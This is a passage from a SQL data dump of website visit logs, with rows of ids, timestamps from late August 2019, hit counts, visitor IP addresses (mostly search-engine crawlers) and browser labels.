1,0,0,'66.249.66.68','chrome'),(445731,1567138552,1,1,0,0,'207.46.13.32','other'),(445732,1567138953,1,1,0,0,'176.9.9.94','other'),(445733,1567139197,2,2,0,0,'66.249.66.222','chrome'),(445734,1567139282,5,5,0,0,'66.249.66.220','chrome'),(445735,1567139374,1,1,0,0,'141.8.142.103','other'),(445736,1567139389,1,1,0,0,'37.9.113.20','other'),(445737,1567140538,1,1,0,0,'87.250.224.65','other'),(445738,1567140548,1,1,0,0,'178.154.171.24','other'),(445739,1567140592,1,1,0,0,'37.9.113.148','other'),(445740,1567141035,1,1,0,0,'40.77.167.167','other'),(445741,1567141103,1,1,0,0,'40.77.167.48','other'),(445742,1567141107,1,1,0,0,'66.249.66.218','chrome'),(445743,1567141775,1,1,0,0,'141.8.142.144','other'),(445744,1567141851,1,1,0,0,'106.75.97.43','msie'),(445745,1567141863,2,2,0,0,'141.8.132.16','other'),(445746,1567141930,1,1,0,0,'66.249.66.222','chrome'),(445747,1567142016,1,1,0,0,'46.159.207.67','chrome'),(445748,1567142404,1,1,0,0,'5.45.207.19','other'),(445749,1567142577,1,1,0,0,'37.9.113.20','other'),(445750,1567143067,1,1,0,0,'37.9.113.103','other'),(445751,1567143209,1,1,0,0,'66.249.66.222','chrome'),(445752,1567143772,2,2,0,0,'66.249.66.220','chrome'),(445753,1567144104,1,1,0,0,'37.204.246.107','msie'),(445754,1567144150,1,1,0,0,'66.249.66.218','chrome'),(445755,1567144763,1,1,0,0,'178.154.171.24','other'),(445756,1567145237,1,1,0,0,'66.249.66.68','chrome'),(445757,1567145670,1,1,0,0,'141.8.188.65','other'),(445758,1567145714,1,1,0,0,'207.46.13.10','other'),(445759,1567145775,1,1,0,0,'87.250.224.65','other'),(445760,1567145990,1,1,0,0,'8.29.198.26','other'),(445761,1567146061,2,2,0,0,'207.46.13.151','other'),(445762,1567146177,1,1,0,0,'66.249.66.218','chrome'),(445763,1567146183,1,1,0,0,'66.249.66.220','chrome'),(445764,1567146288,1,1,0,0,'157.55.39.73','other'),(445765,1567146844,1,1,0,0,'141.8.188.65','other'),(445766,1567146862,1,1,0,0,'95.108.213.4','other'),(445767,1567146901,1,1,0,0,'87.250.224.64','other'),(445768,1567147352,1,1,0,0,'66.249.66.220','chrome'),(445769,1567147546,1,1,0,0,'35.247.124.68','chrome'),(445770,1567147878,1,1,0,0,'40.77.167.127','other'),(445771,1567148057,1,1,0,0,'207.46.13.151','other'),(445772,1567148093,1,1,0,0,'91.196.178.80','chrome'),(445773,1567148178,1,1,0,0,'8.29.198.25','other'),(445774,1567148270,1,1,0,0,'141.8.142.38','other'),(445775,1567148299,1,1,0,0,'87.250.224.81','other'),(445776,1567148752,1,1,0,0,'66.249.66.218','chrome'),(445777,1567148797,1,1,0,0,'157.55.39.73','other'),(445778,1567148807,2,2,0,0,'66.249.66.220','chrome'),(445779,1567148878,1,1,0,0,'37.9.113.103','other'),(445780,1567149228,4,4,0,0,'207.46.13.10','other'),(445781,1567149387,1,1,0,0,'87.250.224.81','other'),(445782,1567149801,1,1,0,0,'157.55.39.73','other'),(445783,1567149805,2,2,0,0,'207.46.13.174','other'),(445784,1567150605,1,1,0,0,'91.196.177.46','chrome'),(445785,1567150814,1,1,0,0,'40.77.167.127','other'),(445786,1567150879,1,1,0,0,'66.249.66.220','chrome'),(445787,1567150906,1,1,0,0,'66.249.66.66','chrome'),(445788,1567150994,1,1,0,0,'66.249.66.218','chrome'),(445789,1567151022,1,1,0,0,'141.8.142.144','other'),(445790,1567153510,1,1,0,0,'141.8.188.65','other'),(445791,1567153561,1,1,0,0,'178.154.171.27','other'),(445792,1567153570,1,1,0,0,'87.250.224.118','other'),(445793,1567153583,2,2,0,0,'66.249.66.218','chrome'),(445794,1567154145,1,1,0,0,'207.46.13.10','other'),(445795,1567154939,2,2,0,0,'157.55.39.73','other'),(445796,1567155371,2,2,0,0,'193.93.79.71','chrome'),(445797,1567155965,1,1,0,0,'66.249.66.222','chrome'),(445798,1567156085,1,1,0,0,'207.46.13.10','other'),(445799,1567156840,1,1,0,0,'8.29.198.27','other'),(445800,1567158737,1,1,0,0,'66.249.66.64','chrome'),(445801,1567158983,1,1,0,0,'207.46.13.162','other'),(445802,1567159017,1,1,0,0,'8.29.198.25','other'),(445803,1567159166,2,2,0,0,'207.46.13.10','other'),(445804,1567160025,1,1,0,0,'91.209.11.236','other'),(445805,1567161164,2,2,0,0,'207.46.13.10','other'),(445806,1567161209,1,1,0,0,'178.154.171.24','other'),(445807,1567161213,1,1,0,0,'178.154.171.27','other'),(445808,1567161554,1,1,0,0,'207.46.13.116','other'),(445809,1567161929,2,2,0,0,'91.200.126.149','other'),(445810,1567162352,1,1,0,0,'207.46.13.162','other'),(445811,1567162632,1,1,0,0,'5.255.253.16','other'),(445812,1567163008,2,2,0,0,'207.46.13.116','other'),(445813,1567163190,1,1,0,0,'78.111.185.217','chrome'),(445814,1567163223,1,1,0,0,'207.46.13.164','other'),(445815,1567163609,1,1,0,0,'95.135.104.228','chrome'),(445816,1567163639,1,1,0,0,'66.249.66.222','chrome'),(445817,1567163800,2,2,0,0,'40.77.167.92','other'),(445818,1567163860,1,1,0,0,'207.46.13.162','other'),(445819,1567164788,1,1,0,0,'109.74.154.72','chrome'),(445820,1567164995,1,1,0,0,'87.250.224.81','other'),(445821,1567165261,3,3,0,0,'40.77.167.92','other'),(445822,1567165265,4,4,0,0,'207.46.13.116','other'),(445823,1567165483,1,1,0,0,'91.196.178.85','chrome'),(445824,1567167202,1,1,0,0,'40.77.167.108','other'),(445825,1567167306,1,1,0,0,'207.46.13.116','other'),(445826,1567167355,4,4,0,0,'176.9.9.94','other'),(445827,1567167408,1,1,0,0,'66.249.66.220','chrome'),(445828,1567167694,1,1,0,0,'8.29.198.26','other'),(445829,1567167756,2,2,0,0,'207.46.13.162','other'),(445830,1567168453,3,3,0,0,'40.77.167.108','other'),(445831,1567168547,1,1,0,0,'66.102.9.30','chrome'),(445832,1567168632,1,1,0,0,'66.249.66.222','chrome'),(445833,1567168893,2,2,0,0,'207.46.13.116','other'),(445834,1567169182,2,2,0,0,'207.46.13.162','other'),(445835,1567169311,2,2,0,0,'40.77.167.92','other'),(445836,1567169858,1,1,0,0,'8.29.198.25','other'),(445837,1567170147,1,1,0,0,'213.180.203.48','other'),(445838,1567170316,1,1,0,0,'176.36.21.189','chrome'),(445839,1567170439,1,1,0,0,'95.108.213.4','other'),(445840,1567170466,2,2,0,0,'207.46.13.116','other'),(445841,1567170619,1,1,0,0,'188.244.34.199','msie'),(445842,1567170681,2,2,0,0,'207.46.13.162','other'),(445843,1567171257,1,1,0,0,'209.17.96.122','other'),(445844,1567171584,1,1,0,0,'207.46.13.116','other'),(445845,1567172022,1,1,0,0,'207.46.13.162','other'),(445846,1567172050,1,1,0,0,'141.8.188.29','other'),(445847,1567172557,1,1,0,0,'207.46.13.116','other'),(445848,1567172627,1,1,0,0,'40.77.167.162','other'),(445849,1567173185,2,2,0,0,'40.77.167.92','other'),(445850,1567173544,2,2,0,0,'82.207.91.234','chrome'),(445851,1567173729,1,1,0,0,'207.46.13.162','other'),(445852,1567173787,1,1,0,0,'40.77.167.162','other'),(445853,1567174091,1,1,0,0,'40.77.167.92','other'),(445854,1567174097,1,1,0,0,'46.211.121.223','chrome'),(445855,1567174698,1,1,0,0,'213.180.203.48','other'),(445856,1567174989,1,1,0,0,'66.249.66.220','chrome'),(445857,1567175163,1,1,0,0,'91.196.178.83','chrome'),(445858,1567175284,1,1,0,0,'207.46.13.162','other'),(445859,1567175767,1,1,0,0,'207.46.13.115','other'),(445860,1567176033,2,2,0,0,'207.46.13.147','other'),(445861,1567176150,1,1,0,0,'157.55.39.232','other'),(445862,1567177370,4,4,0,0,'207.46.13.147','other'),(445863,1567177383,1,1,0,0,'207.46.13.115','other'),(445864,1567177772,1,1,0,0,'95.108.213.4','other'),(445865,1567178383,1,1,0,0,'141.8.188.29','other'),(445866,1567178539,1,1,0,0,'207.46.13.115','other'),(445867,1567178552,1,1,0,0,'8.29.198.26','other'),(445868,1567179216,2,2,0,0,'207.46.13.147','other'),(445869,1567179784,3,3,0,0,'157.55.39.232','other'),(445870,1567180006,1,1,0,0,'40.77.167.92','other'),(445871,1567180255,1,1,0,0,'207.46.13.147','other'),(445872,1567180697,1,1,0,0,'8.29.198.27','other'),(445873,1567181244,1,1,0,0,'157.55.39.232','other'),(445874,1567182110,1,1,0,0,'37.9.113.38','other'),(445875,1567182790,4,4,0,0,'207.46.13.115','other'),(445876,1567182897,5,5,0,0,'157.55.39.232','other'),(445877,1567182907,1,1,0,0,'207.46.13.96','other'),(445878,1567183162,1,1,0,0,'193.106.30.99','chrome'),(445879,1567183410,1,1,0,0,'213.180.203.48','other'),(445880,1567184067,9,9,0,0,'176.9.9.94','other'),(445881,1567184083,1,1,0,0,'66.249.66.220','chrome'),(445882,1567184168,1,1,0,0,'40.77.167.79','other'),(445883,1567184360,1,1,0,0,'207.46.13.96','other'),(445884,1567185339,1,1,0,0,'157.55.39.232','other'),(445885,1567185673,2,2,0,0,'40.77.167.79','other'),(445886,1567186106,1,1,0,0,'207.46.13.96','other'),(445887,1567186313,2,2,0,0,'66.249.66.222','chrome'),(445888,1567186942,1,1,0,0,'207.46.13.115','other'),(445889,1567187015,2,2,0,0,'157.55.39.232','other'),(445890,1567187082,1,1,0,0,'109.63.220.21','msie'),(445891,1567187123,1,1,0,0,'207.46.13.96','other'),(445892,1567187575,2,2,0,0,'40.77.167.79','other'),(445893,1567187625,1,1,0,0,'92.113.156.60','chrome'),(445894,1567188900,1,1,0,0,'207.46.13.115','other'),(445895,1567189394,1,1,0,0,'8.29.198.25','other'),(445896,1567189396,2,2,0,0,'40.77.167.79','other'),(445897,1567189569,2,2,0,0,'207.46.13.96','other'),(445898,1567190057,1,1,0,0,'213.180.203.40','other'),(445899,1567190078,1,1,0,0,'66.249.66.66','chrome'),(445900,1567190184,2,2,0,0,'207.46.13.115','other'),(445901,1567190302,2,2,0,0,'40.77.167.79','other'),(445902,1567190408,1,1,0,0,'91.227.207.2','chrome'),(445903,1567190997,1,1,0,0,'157.55.39.232','other'),(445904,1567191539,1,1,0,0,'8.29.198.26','other'),(445905,1567192079,1,1,0,0,'66.249.66.222','chrome'),(445906,1567192809,3,3,0,0,'157.55.39.232','other'),(445907,1567192839,1,1,0,0,'207.46.13.28','other'),(445908,1567193762,1,1,0,0,'66.249.66.222','chrome'),(445909,1567193926,1,1,0,0,'69.171.251.49','other'),(445910,1567194321,1,1,0,0,'40.77.167.79','other'),(445911,1567194651,2,2,0,0,'207.46.13.96','other'),(445912,1567195652,1,1,0,0,'108.62.3.45','chrome'),(445913,1567196050,1,1,0,0,'66.249.66.218','chrome'),(445914,1567196111,1,1,0,0,'157.55.39.232','other'),(445915,1567196989,2,2,0,0,'207.46.13.96','other'),(445916,1567197373,1,1,0,0,'207.46.13.28','other'),(445917,1567197733,1,1,0,0,'66.249.66.220','chrome'),(445918,1567197814,1,1,0,0,'13.114.149.13','chrome'),(445919,1567197981,1,1,0,0,'66.249.66.218','chrome'),(445920,1567198923,1,1,0,0,'207.46.13.28','other'),(445921,1567198944,2,2,0,0,'40.77.167.190','other'),(445922,1567199326,1,1,0,0,'66.249.66.218','chrome'),(445923,1567199348,1,1,0,0,'141.8.188.65','other'),(445924,1567199480,1,1,0,0,'178.154.171.17','other'),(445925,1567199882,1,1,0,0,'207.46.13.96','other'),(445926,1567200152,1,1,0,0,'207.46.13.28','other'),(445927,1567200240,1,1,0,0,'8.29.198.27','other'),(445928,1567200565,1,1,0,0,'91.196.178.182','chrome'),(445929,1567200587,1,1,0,0,'178.154.171.17','other'),(445930,1567200620,1,1,0,0,'157.55.39.158','other'),(445931,1567200867,7,7,0,0,'176.9.9.94','other'),(445932,1567200970,1,1,0,0,'40.77.167.82','other'),(445933,1567201413,1,1,0,0,'207.46.13.28','other'),(445934,1567201980,1,1,0,0,'40.77.167.82','other'),(445935,1567202383,1,1,0,0,'8.29.198.25','other'),(445936,1567203026,3,3,0,0,'207.46.13.28','other'),(445937,1567203170,1,1,0,0,'157.55.39.110','other'),(445938,1567203778,3,3,0,0,'157.55.39.158','other'),(445939,1567204133,1,1,0,0,'40.77.167.82','other'),(445940,1567204266,1,1,0,0,'66.249.66.66','chrome'),(445941,1567204502,1,1,0,0,'141.8.188.21','other'),(445942,1567205014,2,2,0,0,'157.55.39.110','other'),(445943,1567205106,1,1,0,0,'66.249.66.222','chrome'),(445944,1567205442,1,1,0,0,'95.108.181.96','other'),(445945,1567205694,1,1,0,0,'141.8.142.162','other'),(445946,1567205986,2,2,0,0,'157.55.39.110','other'),(445947,1567206548,4,4,0,0,'207.46.13.28','other'),(445948,1567206568,1,1,0,0,'40.77.167.82','other'),(445949,1567206897,1,1,0,0,'66.249.66.222','chrome'),(445950,1567207604,2,2,0,0,'40.77.167.82','other'),(445951,1567207711,3,3,0,0,'157.55.39.158','other'),(445952,1567208335,1,1,0,0,'207.46.13.28','other'),(445953,1567208614,2,2,0,0,'157.55.39.110','other'),(445954,1567208647,2,2,0,0,'13.66.139.0','other'),(445955,1567209220,1,1,0,0,'40.77.167.82','other'),(445956,1567209279,1,1,0,0,'66.249.66.222','chrome'),(445957,1567209886,2,2,0,0,'157.55.39.110','other'),(445958,1567209967,1,1,0,0,'157.55.39.237','other'),(445959,1567210139,1,1,0,0,'66.249.66.220','chrome'),(445960,1567210148,1,1,0,0,'157.55.39.158','other'),(445961,1567211090,1,1,0,0,'8.29.198.26','other'),(445962,1567211807,1,1,0,0,'157.55.39.110','other'),(445963,1567212036,1,1,0,0,'54.244.159.63','other'),(445964,1567212051,1,1,0,0,'157.55.39.237','other'),(445965,1567212093,1,1,0,0,'157.55.39.158','other'),(445966,1567212793,1,1,0,0,'157.55.39.110','other'),(445967,1567212893,3,3,0,0,'176.9.9.94','other'),(445968,1567213224,1,1,0,0,'8.29.198.26','other'),(445969,1567213697,3,3,0,0,'157.55.39.110','other'),(445970,1567214019,1,1,0,0,'188.165.192.220','firefox'),(445971,1567214288,2,2,0,0,'157.55.39.61','other'),(445972,1567214621,1,1,0,0,'157.55.39.110','other'),(445973,1567215217,2,2,0,0,'157.55.39.187','other'),(445974,1567215291,1,1,0,0,'157.55.39.237','other'),(445975,1567215501,2,2,0,0,'157.55.39.61','other'),(445976,1567215794,1,1,0,0,'157.55.39.110','other'),(445977,1567218308,2,2,0,0,'157.55.39.187','other'),(445978,1567218537,2,2,0,0,'157.55.39.237','other'),(445979,1567218901,2,2,0,0,'157.55.39.61','other'),(445980,1567218909,1,1,0,0,'157.55.39.110','other'),(445981,1567218959,1,1,0,0,'91.209.11.236','other'),(445982,1567219924,2,2,0,0,'157.55.39.61','other'),(445983,1567220648,3,3,0,0,'157.55.39.237','other'),(445984,1567220669,2,2,0,0,'157.55.39.187','other'),(445985,1567221548,1,1,0,0,'213.180.203.40','other'),(445986,1567221931,1,1,0,0,'8.29.198.27','other'),(445987,1567222235,1,1,0,0,'157.55.39.110','other'),(445988,1567222380,1,1,0,0,'157.55.39.187','other'),(445989,1567222737,1,1,0,0,'87.250.224.65','other'),(445990,1567222774,1,1,0,0,'66.249.66.220','chrome'),(445991,1567222783,1,1,0,0,'213.180.203.17','other'),(445992,1567222807,1,1,0,0,'141.8.132.16','other'),(445993,1567222959,1,1,0,0,'157.55.39.237','other'),(445994,1567223136,1,1,0,0,'157.55.39.110','other'),(445995,1567223184,1,1,0,0,'66.249.66.218','chrome'),(445996,1567223439,1,1,0,0,'78.57.227.227','msie'),(445997,1567223585,1,1,0,0,'66.249.66.136','chrome'),(445998,1567224054,1,1,0,0,'8.29.198.27','other'),(445999,1567224056,1,1,0,0,'87.250.224.81','other'),(446000,1567224061,2,2,0,0,'157.55.39.237','other'),(446001,1567224068,1,1,0,0,'176.9.9.94','other'),(446002,1567224567,2,2,0,0,'157.55.39.61','other'),(446003,1567224971,1,1,0,0,'157.55.39.110','other'),(446004,1567225087,1,1,0,0,'37.9.113.148','other'),(446005,1567225317,1,1,0,0,'157.55.39.237','other'),(446006,1567226131,1,1,0,0,'157.55.39.61','other'),(446007,1567226294,2,2,0,0,'157.55.39.110','other'),(446008,1567226320,1,1,0,0,'157.55.39.187','other'),(446009,1567226736,1,1,0,0,'62.205.134.182','other'),(446010,1567227213,2,2,0,0,'157.55.39.110','other'),(446011,1567227642,1,1,0,0,'95.108.181.83','other'),(446012,1567227728,1,1,0,0,'157.55.39.61','other'),(446013,1567227952,2,2,0,0,'157.55.39.237','other'),(446014,1567228186,1,1,0,0,'157.55.39.110','other'),(446015,1567229038,1,1,0,0,'157.55.39.237','other'),(446016,1567229761,1,1,0,0,'141.8.188.21','other'),(446017,1567229787,1,1,0,0,'178.154.171.24','other'),(446018,1567230078,1,1,0,0,'157.55.39.237','other'),(446019,1567230823,1,1,0,0,'46.211.72.235','chrome'),(446020,1567231848,1,1,0,0,'111.231.252.51','other'),(446021,1567231935,1,1,0,0,'40.77.167.81','other'),(446022,1567232774,1,1,0,0,'8.29.198.25','other'),(446023,1567233129,1,1,0,0,'213.180.203.53','other'),(446024,1567233162,1,1,0,0,'178.154.200.8','other'),(446025,1567233435,1,1,0,0,'66.249.66.66','chrome'),(446026,1567234147,1,1,0,0,'193.106.30.99','chrome'),(446027,1567234153,1,1,0,0,'66.249.66.136','chrome'),(446028,1567234337,1,1,0,0,'141.8.188.21','other'),(446029,1567234373,1,1,0,0,'95.108.181.94','other'),(446030,1567234387,1,1,0,0,'207.46.13.34','other'),(446031,1567234471,1,1,0,0,'40.77.167.62','other'),(446032,1567234900,1,1,0,0,'8.29.198.26','other'),(446033,1567235178,1,1,0,0,'5.45.207.76','other'),(446034,1567235436,1,1,0,0,'91.196.178.129','firefox'),(446035,1567235943,3,3,0,0,'40.77.167.95','other'),(446036,1567236017,1,1,0,0,'207.46.13.138','other'),(446037,1567236229,1,1,0,0,'66.249.66.68','chrome'),(446038,1567236566,1,1,0,0,'95.108.213.4','other'),(446039,1567236626,1,1,0,0,'178.154.171.24','other'),(446040,1567236629,1,1,0,0,'37.9.113.103','other'),(446041,1567236659,1,1,0,0,'87.250.224.47','other'),(446042,1567236724,1,1,0,0,'66.249.66.66','chrome'),(446043,1567236805,1,1,0,0,'66.249.66.136','chrome'),(446044,1567236832,2,2,0,0,'66.249.66.134','chrome'),(446045,1567237513,1,1,0,0,'157.55.39.61','other'),(446046,1567238015,1,1,0,0,'178.154.200.8','other'),(446047,1567238243,1,1,0,0,'66.249.66.136','chrome'),(446048,1567240094,1,1,0,0,'176.9.9.94','other'),(446049,1567240337,1,1,0,0,'66.249.66.138','chrome'),(446050,1567240461,1,1,0,0,'178.154.171.69','other'),(446051,1567240473,1,1,0,0,'87.250.224.47','other'),(446052,1567243453,1,0,1,0,'164.132.119.83',''),(446053,1567243501,1,1,0,0,'213.180.203.61','other'),(446054,1567243504,1,1,0,0,'37.9.113.38','other'),(446055,1567243618,1,1,0,0,'8.29.198.27','other'),(446056,1567244384,1,1,0,0,'66.249.66.66','chrome'),(446057,1567245301,1,1,0,0,'40.77.167.81','other'),(446058,1567245729,1,1,0,0,'40.77.167.95','other'),(446059,1567245740,1,1,0,0,'8.29.198.25','other'),(446060,1567245975,1,1,0,0,'66.249.66.138','chrome'),(446061,1567246136,1,1,0,0,'87.250.224.107','other'),(446062,1567246695,1,1,0,0,'40.77.167.159','other'),(446063,1567248042,1,1,0,0,'195.123.211.55','chrome'),(446065,1567248271,1,1,0,0,'40.77.167.81','other'),(446066,1567248957,1,1,0,0,'95.108.213.4','other'),(446067,1567249008,1,1,0,0,'213.180.203.53','other'),(446068,1567249307,1,1,0,0,'40.77.167.206','other'),(446069,1567249955,1,1,0,0,'109.74.154.72','chrome'),(446070,1567250262,1,1,0,0,'40.77.167.206','other'),(446071,1567250782,1,1,0,0,'91.209.11.236','other'),(446072,1567251702,1,1,0,0,'66.249.66.136','chrome'),(446073,1567251739,1,1,0,0,'176.9.9.94','other'),(446074,1567251864,1,1,0,0,'40.77.167.206','other'),(446075,1567252290,1,1,0,0,'40.77.167.215','other'),(446076,1567252384,1,1,0,0,'95.24.35.44','msie'),(446077,1567253647,1,1,0,0,'213.180.203.40','other'),(446078,1567253773,1,1,0,0,'40.77.167.206','other'),(446079,1567253806,1,1,0,0,'213.180.203.53','other'),(446080,1567254465,1,1,0,0,'8.29.198.27','other'),(446081,1567256065,1,1,0,0,'40.77.167.26','other'),(446082,1567256579,1,1,0,0,'8.29.198.26','other'),(446083,1567256585,1,1,0,0,'95.108.213.4','other'),(446084,1567256784,1,1,0,0,'178.154.200.8','other'),(446085,1567257416,1,1,0,0,'66.249.66.64','chrome'),(446086,1567257748,1,1,0,0,'207.46.13.67','other'),(446087,1567257925,1,1,0,0,'40.77.167.206','other'),(446088,1567258225,1,1,0,0,'66.249.66.68','chrome'),(446089,1567258644,1,1,0,0,'178.154.171.24','other'),(446090,1567258788,1,1,0,0,'141.8.142.65','other'),(446091,1567258854,1,1,0,0,'178.154.200.8','other'),(446092,1567258975,1,1,0,0,'37.9.113.38','other'),(446093,1567259959,1,1,0,0,'62.183.125.217','chrome'),(446094,1567260373,1,1,0,0,'40.77.167.107','other'),(446095,1567260559,1,1,0,0,'207.46.13.87','other'),(446096,1567260583,1,1,0,0,'62.64.80.106','chrome'),(446097,1567260701,1,1,0,0,'66.249.66.134','chrome'),(446098,1567261140,1,1,0,0,'95.108.213.4','other'),(446099,1567262091,1,1,0,0,'51.68.152.26','chrome'),(446100,1567262390,1,1,0,0,'207.46.13.216','other'),(446101,1567262614,1,1,0,0,'207.46.13.75','other'),(446102,1567264226,1,1,0,0,'40.77.167.107','other'),(446103,1567264393,1,1,0,0,'207.46.13.87','other'),(446104,1567265157,1,1,0,0,'141.8.142.65','other'),(446105,1567265167,1,1,0,0,'40.77.167.107','other'),(446106,1567265204,1,1,0,0,'46.96.25.92','chrome'),(446107,1567265315,1,1,0,0,'8.29.198.27','other'),(446108,1567266271,1,1,0,0,'207.46.13.216','other'),(446109,1567266793,1,1,0,0,'141.8.188.65','other'),(446110,1567266929,1,1,0,0,'5.255.253.38','other'),(446111,1567267221,1,1,0,0,'91.209.11.236','other'),(446112,1567267265,1,1,0,0,'141.8.142.191','other'),(446113,1567267428,1,1,0,0,'8.29.198.25','other'),(446114,1567267604,2,2,0,0,'176.9.9.94','other'),(446115,1567267884,1,1,0,0,'52.162.161.148','other'),(446116,1567268072,1,1,0,0,'66.249.66.138','chrome'),(446117,1567268100,1,1,0,0,'66.249.66.136','chrome'),(446118,1567268987,1,1,0,0,'37.52.22.38','chrome'),(446119,1567269640,1,1,0,0,'193.106.30.99','chrome'),(446120,1567270530,2,2,0,0,'207.46.13.87','other'),(446121,1567271464,1,1,0,0,'66.249.66.68','chrome'),(446122,1567273114,1,1,0,0,'207.46.13.216','other'),(446123,1567273726,1,1,0,0,'207.46.13.75','other'),(446124,1567273840,1,1,0,0,'207.46.13.87','other'),(446125,1567274311,1,1,0,0,'207.46.13.216','other'),(446126,1567275077,1,1,0,0,'37.73.128.189','chrome'),(446127,1567275420,1,1,0,0,'66.249.66.136','chrome'),(446128,1567276164,1,1,0,0,'8.29.198.27','other'),(446129,1567276220,1,1,0,0,'207.46.13.75','other'),(446130,1567276528,1,1,0,0,'157.55.39.64','other'),(446131,1567276788,1,1,0,0,'207.46.13.87','other'),(446132,1567276833,1,0,1,0,'164.132.119.83',''),(446133,1567277287,1,1,0,0,'66.249.66.134','chrome'),(446134,1567277563,1,1,0,0,'141.8.142.65','other'),(446135,1567277613,1,1,0,0,'176.9.9.94','other'),(446136,1567277749,1,1,0,0,'207.46.13.75','other'),(446137,1567277773,1,1,0,0,'207.46.13.216','other'),(446138,1567277941,1,1,0,0,'213.180.203.23','other'),(446139,1567278278,1,1,0,0,'8.29.198.25','other'),(446140,1567278997,1,1,0,0,'66.249.66.64','chrome'),(446141,1567279329,1,1,0,0,'157.55.39.64','other'),(446142,1567280663,1,1,0,0,'66.249.66.136','chrome'),(446143,1567280749,1,1,0,0,'66.249.66.134','chrome'),(446144,1567281068,1,1,0,0,'176.110.134.2','chrome'),(446145,1567281310,1,1,0,0,'157.55.39.64','other'),(446146,1567282931,1,1,0,0,'213.180.203.61','other'),(446147,1567282982,1,1,0,0,'141.8.132.16','other'),(446148,1567283122,1,1,0,0,'194.31.46.73','other'),(446149,1567284931,2,2,0,0,'207.46.13.75','other'),(446150,1567285363,1,1,0,0,'66.249.66.138','chrome'),(446151,1567285512,1,1,0,0,'178.133.135.113','chrome'),(446152,1567285521,5,5,0,0,'66.249.88.94','chrome'),(446153,1567285613,1,1,0,0,'66.249.83.200','chrome'),(446154,1567285639,1,1,0,0,'157.55.39.64','other'),(446155,1567285934,1,1,0,0,'213.180.203.61','other'),(446156,1567285949,1,1,0,0,'157.55.39.139','other'),(446157,1567286288,1,1,0,0,'89.208.86.188','chrome'),(446158,1567286333,1,1,0,0,'141.8.142.81','other'),(446159,1567287013,1,1,0,0,'8.29.198.25','other'),(446160,1567287028,1,1,0,0,'79.137.130.120','chrome'),(446161,1567287030,1,1,0,0,'193.106.30.99','chrome'),(446162,1567287417,1,1,0,0,'89.208.86.230','chrome'),(446163,1567287516,2,2,0,0,'157.55.39.139','other'),(446164,1567287554,1,1,0,0,'66.249.66.138','chrome'),(446165,1567287755,1,1,0,0,'157.55.39.64','other'),(446166,1567288166,1,1,0,0,'176.9.9.94','other'),(446167,1567289124,1,1,0,0,'8.29.198.26','other'),(446168,1567289389,1,1,0,0,'66.249.66.134','chrome'),(446169,1567289517,1,1,0,0,'40.77.167.161','other'),(446170,1567291872,1,1,0,0,'46.48.13.161','chrome'),(446171,1567291953,1,1,0,0,'40.77.167.161','other'),(446172,1567292191,1,1,0,0,'40.77.167.13','other'),(446173,1567293217,1,1,0,0,'87.250.224.99','other'),(446174,1567293301,1,1,0,0,'66.249.66.136','chrome'),(446175,1567293417,2,2,0,0,'66.249.66.138','chrome'),(446176,1567293856,2,2,0,0,'40.77.167.161','other'),(446177,1567294535,1,1,0,0,'95.108.181.94','other'),(446178,1567295049,2,2,0,0,'66.249.66.134','chrome'),(446179,1567295445,1,1,0,0,'40.77.167.161','other'),(446180,1567295590,1,1,0,0,'40.77.167.13','other'),(446181,1567296167,1,1,0,0,'178.154.171.30','other'),(446182,1567296383,1,1,0,0,'66.249.66.136','chrome'),(446183,1567296704,1,1,0,0,'40.77.167.13','other'),(446184,1567296711,1,1,0,0,'40.77.167.161','other'),(446185,1567297365,1,1,0,0,'35.180.89.159','other'),(446186,1567297840,1,1,0,0,'40.77.167.13','other'),(446187,1567297853,1,1,0,0,'8.29.198.27','other'),(446188,1567297994,1,1,0,0,'157.55.39.244','other'),(446189,1567298290,1,1,0,0,'193.106.30.99','chrome'),(446190,1567298612,1,1,0,0,'66.249.66.138','chrome'),(446191,1567298621,1,1,0,0,'95.108.181.83','other'),(446192,1567298639,1,1,0,0,'5.45.207.76','other'),(446193,1567298714,2,2,0,0,'66.249.66.134','chrome'),(446194,1567299421,1,1,0,0,'40.77.167.13','other'),(446195,1567299746,2,2,0,0,'176.9.9.94','other'),(446196,1567299771,1,1,0,0,'157.55.39.139','other'),(446197,1567299964,1,1,0,0,'8.29.198.27','other'),(446198,1567300200,1,1,0,0,'157.55.39.244','other'),(446199,1567300220,1,1,0,0,'66.249.66.64','chrome'),(446200,1567300400,1,1,0,0,'66.249.66.138','chrome'),(446201,1567301836,2,2,0,0,'157.55.39.244','other'),(446202,1567301904,2,2,0,0,'157.55.39.139','other'),(446203,1567302172,3,3,0,0,'66.249.66.134','chrome'),(446204,1567302920,1,1,0,0,'141.8.188.65','other'),(446205,1567302944,1,1,0,0,'141.8.142.81','other'),(446206,1567303139,1,1,0,0,'213.180.203.61','other'),(446207,1567304027,1,1,0,0,'66.249.66.136','chrome'),(446208,1567304158,1,1,0,0,'66.249.66.138','chrome'),(446209,1567304206,2,2,0,0,'66.249.66.134','chrome'),(446210,1567304972,1,1,0,0,'178.154.171.30','other'),(446211,1567305081,1,1,0,0,'141.8.132.16','other'),(446212,1567305673,1,1,0,0,'66.249.66.68','chrome'),(446213,1567305757,1,1,0,0,'157.55.39.244','other'),(446214,1567305899,1,1,0,0,'66.249.66.134','chrome'),(446215,1567305950,2,2,0,0,'66.249.66.136','chrome'),(446216,1567306122,1,1,0,0,'5.255.253.38','other'),(446217,1567306205,1,1,0,0,'141.8.188.21','other'),(446218,1567307007,1,1,0,0,'66.249.66.64','chrome'),(446219,1567307375,1,1,0,0,'66.249.66.136','chrome'),(446220,1567307890,1,1,0,0,'157.55.39.208','other'),(446221,1567307927,2,2,0,0,'66.249.66.134','chrome'),(446222,1567307980,1,1,0,0,'66.249.66.138','chrome'),(446223,1567307995,1,1,0,0,'157.55.39.244','other'),(446224,1567308370,1,1,0,0,'207.46.13.31','other'),(446225,1567308698,1,1,0,0,'8.29.198.25','other'),(446226,1567309306,1,1,0,0,'40.77.167.142','other'),(446227,1567309621,1,1,0,0,'176.9.9.94','other'),(446228,1567310803,1,1,0,0,'8.29.198.25','other'),(446229,1567310844,1,1,0,0,'207.46.13.31','other'),(446230,1567311392,1,1,0,0,'91.196.178.175','chrome'),(446231,1567311846,1,1,0,0,'157.55.39.244','other'),(446232,1567311930,1,1,0,0,'157.55.39.208','other'),(446233,1567313129,1,1,0,0,'40.77.167.142','other'),(446234,1567313246,1,1,0,0,'62.205.134.182','other'),(446235,1567313422,2,2,0,0,'157.55.39.244','other'),(446236,1567314384,1,1,0,0,'207.46.13.31','other'),(446237,1567315146,1,1,0,0,'66.249.66.64','chrome'),(446238,1567315290,1,1,0,0,'193.106.30.99','chrome'),(446239,1567317072,1,1,